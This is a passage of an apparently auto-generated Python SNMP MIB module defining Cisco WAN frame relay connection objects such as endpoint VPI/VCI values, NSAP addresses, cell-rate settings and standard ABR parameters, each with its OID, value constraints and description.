if mibBuilder.loadTexts: frLocalVpi.setDescription('The value of this object provides the VPI value for the local endpoint. This object in conjunction with frLocalVci and frLocalNSAP represents the local end point of this connection. The service module sets this to value 0.')
frLocalVci = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 36), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frLocalVci.setStatus('current')
if mibBuilder.loadTexts: frLocalVci.setDescription("The value of this object provides the VCI value for the local endpoint. This object in conjunction with frLocalVpi and frLocalNSAP represents the local end point of this connection. The service module assigns this value specified in object 'dLCI'.")
frLocalNSAP = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 37), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frLocalNSAP.setStatus('current')
if mibBuilder.loadTexts: frLocalNSAP.setDescription('The value of this object identifies the NSAP address of the frame relay connection. The value of this object follows the format: Prefix : 13 Bytes Cisco ID : 2 bytes Reserved : 1 byte Slot Number : 1 byte Port Number : 2 bytes ESL : 1 byte For FRSM12 Card: This object will have the NSAP format as required by the PNNI controller ')
frRemoteVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 38), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteVpi.setStatus('current')
if mibBuilder.loadTexts: frRemoteVpi.setDescription('The value of this object identifies the VPI value of remote end point of this connection. The frRemoteVpi, frRemoteVci and frRemoteNSAP identifies the remote end point of this connection.')
frRemoteVci = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 39), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteVci.setStatus('current')
if mibBuilder.loadTexts: frRemoteVci.setDescription('The value of this object identifies the VCI value of remote end point of this connection. The frRemoteVpi, frRemoteVci and frRemoteNSAP identifies the remote end point of this connection.')
frRemoteNSAP = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 40), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteNSAP.setStatus('current')
if mibBuilder.loadTexts: frRemoteNSAP.setDescription('The value of this object identifies the NSAP address of the frame relay connection. The value of this object follows the format: Prefix : 13 Bytes Cisco ID : 2 bytes Reserved : 1 byte Slot Number : 1 byte Port Number : 2 bytes ESL : 1 byte.')
frMastership = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 41), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("master", 1), ("slave", 2), ("unknown", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frMastership.setStatus('current')
if mibBuilder.loadTexts: frMastership.setDescription(' This is used by PXM to determine if this end point is master or slave, a new type unknown is added to identify the SM in MGX8220 shelf and the SM in MGX shelf. In AXIS shelf, user can still use addchan to add a channel without specifying X/Y/P parameters. But in MGX shelf, if the user uses addchan without X/Y/P set (based on this object being set to type 3 unknown), SPM on PXM will reject the request. It must be supplied in connection setup request. In the feeder mode, this is always set to master. ')
frVpcFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 42), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("vpc", 1), ("vcc", 2))).clone('vcc')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frVpcFlag.setStatus('current')
if mibBuilder.loadTexts: frVpcFlag.setDescription(" This represents the connection type, used for PXM to identify VPC/VCC but FRSM card doesn't use it always set to vcc for FRSM card For FRSM12 Card: For chanFrConnType = pnni(5), this object is set to vcc(2) always.")
frConnServiceType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 43), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32))).clone(namedValues=NamedValues(("cbr", 1), ("vbr", 2), ("notUsed", 3), ("ubr", 4), ("atfr", 5), ("abrstd", 6), ("abrfst", 7), ("vbrrt", 8), ("cbr1", 21), ("vbr1rt", 22), ("vbr2rt", 23), ("vbr3rt", 24), ("vbr1nrt", 25), ("vbr2nrt", 26), ("vbr3nrt", 27), ("ubr1", 28), ("ubr2", 29), ("stdabr", 30), ("cbr2", 31), ("cbr3", 32))).clone('atfr')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnServiceType.setStatus('current')
if mibBuilder.loadTexts: frConnServiceType.setDescription("This specifies the service type 1 ==> Constant Bit Rate 2 ==> Variable Bit Rate 3 ==> Not used 4 ==> Unspecified Bit Rate 5 ==> ATM frame relay 6 ==> standard ABR 7 ==> foresight ABR Note that this is used by PXM card, SV+ doesn't need to set it, if not set in the connection setup request, it'll be defaulted to ATFR type for FRSM. Also to make it compatible with existing AUSM MIB definition, value 3 is not used. The following types are being added for PNNI support. and are based on UNI 4.0 cbr1 (21) - CBR.1 vbr1rt (22) - Real time VBR.1 vbr2rt (23) - Real time VBR.2 vbr3rt (24) - Real time VBR.3 vbr1nrt(25) - Non Real time VBR.1 vbr2nrt(26) - Non Real time VBR.2 vbr3nrt(27) - Non Real time VBR.3 ubr1 (28) - UBR.1 ubr2 (29) - UBR.2 stdabr (30) - TM 4.0 compliant standard ABR cbr2 (31) - CBR.2 cbr3 (32) - CBR.3 For FRSM12 Card: Not Supported. Derived from chanServType. ")
frRoutingPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 44), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRoutingPriority.setStatus('current')
if mibBuilder.loadTexts: frRoutingPriority.setDescription(' This is used by PXM to determine how important this connection is when selecting connections to route ')
frMaxCost = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 45), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frMaxCost.setStatus('current')
if mibBuilder.loadTexts: frMaxCost.setDescription("The value of this object specifies the Maximum allowed cost. It is related to Cost Based Routing. This is used by PXM so that it won't choose a path with a cost greater than this configured level. This is not necessary to be provided in the connection setup request, if not provided, the default value 255 will be used. Also the range supported depends upon the controller configured : Controller Range Default Value chanFrConnType = par(2) 1..65535 255 chanFrConnType = pnni(5) 1..2147483647 2147483647. ")
frRestrictTrunkType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 46), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("norestriction", 1), ("terrestrialTrunk", 2), ("sateliteTrunk", 3))).clone('norestriction')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRestrictTrunkType.setStatus('current')
if mibBuilder.loadTexts: frRestrictTrunkType.setDescription(' Restricted trunk type for routing, used by PXM. It specifies that the connection either cannot be routed over satelite trunks, or terrestrial trunks, or it can be on any type of trunk. It is not necessary to be provide in the connection setup request, the default value is norestriction(1). For FRSM12 Card: Not Supported ')
frConnPCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 47), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnPCR.setStatus('current')
if mibBuilder.loadTexts: frConnPCR.setDescription("The value of this object identifies the PCR(Peak Cell Rate). If not provided in the connection setup request, it'll be derived from object 'pir'. For FRSM12 Card: Default value is (1.44 * CIR) ")
frConnRemotePCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 48), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemotePCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemotePCR.setDescription(' Peak cell rate of the other end, if not set, will be set to the same as local end PCR (frConnPCR). However, note that if the CIRs for both local and remote end are set to the different value (i.e., asymmetric conn), then this should be set differently from local end PCR. For FRSM12 Card: Default value is frConnPCR ')
frConnMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 49), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnMCR.setStatus('current')
if mibBuilder.loadTexts: frConnMCR.setDescription(" Minimum cell rate, if not provided in the connection setup request, it'll be derived from object 'mir'. For FRSM12 Card: Default value is frConnPCR ")
frConnRemoteMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 50), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteMCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteMCR.setDescription(' Minimum cell rate of the other end, if not set, will be set to the same as local end MCR (frConnMCR). However, note that if the CIRs for both local and remote end are set to the different value (i.e., asymmetric conn), then this should be set differently from local end MCR. For FRSM12 Card: Default value is frConnMCR ')
frConnPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 51), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100)).clone(100)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnPercentUtil.setStatus('current')
if mibBuilder.loadTexts: frConnPercentUtil.setDescription("This is the expected long-term utilization of the channel by this end-point. If this is not specified in the connection setup request, it'll be defaulted to 100 percent For FRSM12 Card: Not Supported ")
frConnRemotePercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 52), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemotePercentUtil.setStatus('current')
if mibBuilder.loadTexts: frConnRemotePercentUtil.setDescription("This is the expected long-term utilization of the channel by the other end-point. If this is not specified in the connection setup request, it'll be set to be the same as the local end frConnPercentUtil value assuming that the connection is symmetric. In a asymmetric connection, this object is supposed to be set. For FRSM12 Card: Not Supported.")
frConnForeSightEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 53), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnForeSightEnable.setStatus('current')
if mibBuilder.loadTexts: frConnForeSightEnable.setDescription("This object is used by the controller(PAR/PNNI/TAG) to set up the Qbin for the connection, if this is not set, it'll be defaulted by SM to the same as foreSightEnable in the end point parameters. For FRSM12 Card: Not Supported.")
frConnFGCRAEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 54), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnFGCRAEnable.setStatus('current')
if mibBuilder.loadTexts: frConnFGCRAEnable.setDescription('The value of this object is used for enabling/disabling Frame based GCRA (early packet discard). For FRSM12 Card: Not Supported.')
chanServType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 55), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("highpriority", 1), ("rtVBR", 2), ("nrtVBR", 3), ("aBR", 4), ("uBR", 5), ("queue6", 6), ("queue7", 7), ("queue8", 8), ("stdABR", 9)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServType.setStatus('current')
if mibBuilder.loadTexts: chanServType.setDescription('The value of this object indicates the indicates the class of the connection. 1-High priority (typically CBR connections) 2- real-time VBR 3- non-real time VBR 4- Available Bit Rate 5- Unspecified Bit Rate 9- Standard ABR There are 8 queues actually but only 4 are being used (the 4 queues are for CBR, VBR-rt, <VBR-nrt and ABR>, UBR traffic). This object is suported only in FRSM-VHS and FRSM-8T1E1. For FRSM-8T1E1, a 0 indicates that the connections are of old model type where chanServType object is unused. For FRSM12 Card: The types aBR, queue6, queue7, queue8 are not supported This object can not be modified after a frame relay connection has been created.')
chanServiceRateOverride = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServiceRateOverride.setStatus('current')
if mibBuilder.loadTexts: chanServiceRateOverride.setDescription('This variable sets the SAR IR programming option. Foresight and chanServiceRateOverride are mutually exclusive. For FRSM12 Card: Not Supported.')
chanServiceRate = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 57), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServiceRate.setStatus('current')
if mibBuilder.loadTexts: chanServiceRate.setDescription('This is the rate to which IR can be set to when chanServiceRateOverride is set to enable(1). If chanServiceRateOverride is disable(2) then this object does not have any significance. For FRSM-8T1/8E1,this is defined in fastpackets/sec. For FRSM-VHS, this is defined in atm cells per second. For VHS the range in cells per second will be 10 to 400000 cps. For FRSM12 Card: Not Supported.')
zeroCirConEir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 58), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 52000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zeroCirConEir.setStatus('current')
if mibBuilder.loadTexts: zeroCirConEir.setDescription("The value of this object defines defines EIR value for '0' CIR connection. If the value is '0', EIR is set to port speed. If zeroCirConEir is non-zero value, EIR is set to value of this object, and this value is used for policing in ingress direction. This object is valid only for a zero cir connection. zeroCirConEir has to be less than or equal to the port speed.")
chanReroute = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 59), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2))).clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanReroute.setStatus('current')
if mibBuilder.loadTexts: chanReroute.setDescription(' This is used by the administrator to trigger the re-routing of the connection. The rerouting takes effect, when this object is set to true(1). When set to false (2), no action is taken. A get on this object always returns false (2). This object is not applicable to MGX Release 1.x. ')
frConnSCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 60), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnSCR.setStatus('current')
if mibBuilder.loadTexts: frConnSCR.setDescription(' Sustained cell rate, Used for VBR connections setup with PNNI controller. For FRSM12 Card: Default value is frConnPCR This object is not applicable to MGX Release 1.x.')
frConnRemoteSCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 61), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteSCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteSCR.setDescription(' Sustained cell rate of the other end, Used for VBR connections setup with PNNI controller. For FRSM12 Card: Default value is frConnSCR This object is not applicable to MGX Release 1.x ')
frConnTemplateId = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 62), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 17)).clone(17)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnTemplateId.setStatus('current')
if mibBuilder.loadTexts: frConnTemplateId.setDescription('This object specifies the template identifier for the connection template associated with this connection. The valid range for templates is 1..16. A value of 17 indicates no template is associated with this connection For FRSM12 Card: Not Supported This object is not applicable to MGX Release 1.x ')
frConnAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 63), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2))).clone('down')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnAdminStatus.setStatus('current')
if mibBuilder.loadTexts: frConnAdminStatus.setDescription('This object specifies channel admin status. This object is not applicable to MGX Release 1.x.')
frChanCnfChangeCount = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 64), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: frChanCnfChangeCount.setStatus('current')
if mibBuilder.loadTexts: frChanCnfChangeCount.setDescription('This object is added only for FRSM12 card. This counter tracks the number of configuration changes that happen on a channel. The counter is associated only with the end point and NOT with the connection itself. This counter is used by the NMS to determine if a connection configuration had been modified and requires an upload. This functionality is conventionally achieved by time stamping using a time-of-day clock. However, in switches where time-of-day clock is not available, the following scheme is used: The upload counter is incremented, when: * assignment of connection to an end point channel. This happens when a connection is added and assigned this channel number. * de-assignment of connection from a channel number. This happens when a connection is deleted and the end point resource is released. * When there is a configuration change done to the connection that is associated with this end point channel number. In a new system, an unutilised resouce (channel number) has a counter value of zero. When a connection is added to this channel end point, the counter is incremented. And is incremented for any of the above operations. When a connection is deleted the value of this counter is incremented and preserved till a new connection gets associated with this channel end point. This object is not applicable to MGX Release 1.x.')
frChanCnfIgnoreIncomingDE = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 65), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanCnfIgnoreIncomingDE.setStatus('current')
if mibBuilder.loadTexts: frChanCnfIgnoreIncomingDE.setDescription('This object is added for FRSM12 card. When this object is enabled, the incoming frames with DE(Discard Eligible) bit set to 1 are counted in the Bc bucket instead of Be bucket This object is not applicable to MGX Release 1.x.')
frChanOamCCEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 66), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanOamCCEnable.setStatus('current')
if mibBuilder.loadTexts: frChanOamCCEnable.setDescription('This object is added for FRSM12 card. This object serves to enable or disable continuity check(CC) on a connection endpoint. When continuity check is enabled on an endpoint, the endpoint anticipates OAM CC cells from its peer endpoint. OAM CC cells are sent when the peer endpoint does not have traffic cells to send. If the connection is idle and this endpoint has not received OAM CC cells for a period of 3.5 +/- 0.5 seconds, it declares continuity failure. This object serves to administratively control the CC feature. Typical implementations (of this feature) may choose to ignore this control or impose other conditions to actually enable CC cell flow. However, if this object is set to false(2), then this feature should be disabled This object is not applicable to MGX Release 1.x.')
frChanStatsEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanStatsEnable.setStatus('current')
if mibBuilder.loadTexts: frChanStatsEnable.setDescription(' This object serves the purpose of enabling/disabling statistics collection on a per connection basis. In implementations which do not have such limitations, this object can be set to enable(1) for all connections. Limits imposed by software or hardware implementations could restrict the amount of statistical data that can be maintained in a physical entity (like a service module card). Hence there could be a need to restrict statistics collection to a smaller subset. This object is not applicable to MGX Release 1.x.')
frChanLocalLpbkEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 68), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanLocalLpbkEnable.setStatus('current')
if mibBuilder.loadTexts: frChanLocalLpbkEnable.setDescription('This object is added for FRSM12 card. This object when enabled adds a channel-level loopback towards the port side. If the connection is in loopback, Connection MIB (FrChanCnfGrpEntry) variables cannot be modified. This object is not applicable to MGX Release 1.x. ')
frChanUpcEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 69), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanUpcEnable.setStatus('current')
if mibBuilder.loadTexts: frChanUpcEnable.setDescription(' This object is added for FRSM12 card. This object when disabled, disables Frame Relay policing. This object is not applicable to MGX Release 1.x. ')
frChanSlaveType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 70), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("persistentSlave", 1), ("nonPersistentSlave", 2))).clone('persistentSlave')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanSlaveType.setStatus('current')
if mibBuilder.loadTexts: frChanSlaveType.setDescription("This object is added for FRSM12 card. This object indicates whether a master endpoint has a persistent slave or not. A connection with a master and a non-persistent slave is considered a single-ended SPVC. This object is only meaningful when 'frMastership' contains the value of 'master(1)'. And this variable must be used with 'frMastership' to decide if a connection is single-ended or not. This object is not applicable to MGX Release 1.x.")
frConnRemoteMBS = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 71), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 5000000)).clone(1024)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteMBS.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteMBS.setDescription("Remote Maximum Burst Size in terms of number of cells. This object should be set by the user in cases when the remote end of the connection is an ATM end-point where the Local MBS can be explicitly specified. In such cases, this element should be set to be equal to the remote end-point's local MBS. This object is not applicable to MGX Release 1.x. ")
frChanPrefRouteId = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 72), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanPrefRouteId.setStatus('current')
if mibBuilder.loadTexts: frChanPrefRouteId.setDescription("This object serves to to associate a preferred route with a connection. The value '0' means no preferred route is associated with this connection. Usage: - If the value of this set to 0, the object frChanDirectRoute is automatically set to FALSE by the switch. - The preferred route is defined in cwaPrefRouteConfTable object.")
frChanDirectRoute = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 73), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanDirectRoute.setStatus('current')
if mibBuilder.loadTexts: frChanDirectRoute.setDescription('This object serves to associate a prefer route as directed route (correspond to the prefer route object frChanPrefRouteId). A directed route specifies that the associated preferred route is the only permission route for the connection to take. Should the associated preferred route be unavailable, the connection is failed. The object is not applicable if there is no associated preferred route with the connection.')
chanNumNextAvailable = MibScalar((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanNumNextAvailable.setStatus('current')
if mibBuilder.loadTexts: chanNumNextAvailable.setDescription("This variable contains the next UNUSED channel number of the maximum possible value(depends upon the service module). This number can be used in channel config table, the ChanNumNextAvailable gets updated if the number gets used to create a logical channel. A '0' indicates that no more channels are available. For FRSM12 Card: Not Supported.")
frstdABRCnfGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3), )
if mibBuilder.loadTexts: frstdABRCnfGrpTable.setStatus('current')
if mibBuilder.loadTexts: frstdABRCnfGrpTable.setDescription('This table is used for configuring ABR parameters on a frame relay connection. ')
frstdABRCnfGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "frstdABRcnfChanNum"))
if mibBuilder.loadTexts: frstdABRCnfGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frstdABRCnfGrpEntry.setDescription('An entry in ABR Configuration table.')
frstdABRcnfChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frstdABRcnfChanNum.setStatus('current')
if mibBuilder.loadTexts: frstdABRcnfChanNum.setDescription('Refers to the virtual connection index. The value supported depends upon the type of service module. Supported Range for different Card Types: FRSM-4T1/E1 : supported range is 16..271 (256 entries) FRSM-8T1/E1 : supported range is 16..1015 (1000 entries) FRSM-T3/E3/HS2/ /HS2B-HSSI/T3B/E3B : supported range is 16..2015 (2000 entries) FRSM-2CT3/HS2B-12IN1: supported range is 16..4015 (4000 entries) FRSM12 Card: Byte 3 = Chassis Number, Byte 2 = Slot Number, Byte 1 & 0 = channel Number. Lower two bytes range from 16..16015 (16000 entries) ')
frstdABRTBE = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215)).clone(16777215)).setUnits('cells').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRTBE.setStatus('current')
if mibBuilder.loadTexts: frstdABRTBE.setDescription('The value of this object is equal to Transient Buffer Exposure(TBE). The TBE is a negotiated number of cells that the network would like to limit the source to sending during startup periods, before the first RM-cell returns.')
frstdABRFRTT = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16700))).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRFRTT.setStatus('current')
if mibBuilder.loadTexts: frstdABRFRTT.setDescription('The value of this object is equal to Fixed Round-Trip Time(FRTT). The FRTT is sum of the fixed propogation delays from the source to a destination network. The Value 0 signifies that FRTT is not available.')
frstdABRRDF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32768)).clone(16)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRRDF.setStatus('current')
if mibBuilder.loadTexts: frstdABRRDF.setDescription('The value of this object is equal to Rate Decrease Factor(RDF). The RDF controls the rate decrease which occurs when backward RM-cells with CI=1 are received. Larger values lead to faster rate decrease. The value specified has to be inverted to arrive at the actual value. The valid values possible are only powers of 2; i.e. 1, 2, 4, 8 ..... 32768. The SNMP agent has to verify this compliance.')
frstdABRRIF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32768)).clone(64)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRRIF.setStatus('current')
if mibBuilder.loadTexts: frstdABRRIF.setDescription('The value of this object is equal to Rate Increase Factor(RIF). The RIF controls the rate increase which occurs when a backward RM-cell is received with CI=0 and NI=0. The value specified has to be inverted to arrive at the actual value. The valid values possible are only powers of 2; i.e. 1, 2, 4, 8 ..... 32768. The SNMP agent has to verify this compliance.')
frstdABRNrm = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 256)).clone(64)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRNrm.setStatus('current')
if mibBuilder.loadTexts: frstdABRNrm.setDescription('The value of this object is equal to number of cells a source may send for each forward RM cell. The valid values possible are only powers of 2 starting from 2; i.e. 2, 4, 8 ..... 256. The SNMP agent has to verify this compliance.')
frstdABRTrm = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(3, 255)).clone(255)).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRTrm.setStatus('current')
if mibBuilder.loadTexts: frstdABRTrm.setDescription('The value of this object is equal to Upper bound on the time between forward RM cells for an active source.')
frstdABRCDF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 64)).clone(16)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRCDF.setStatus('current')
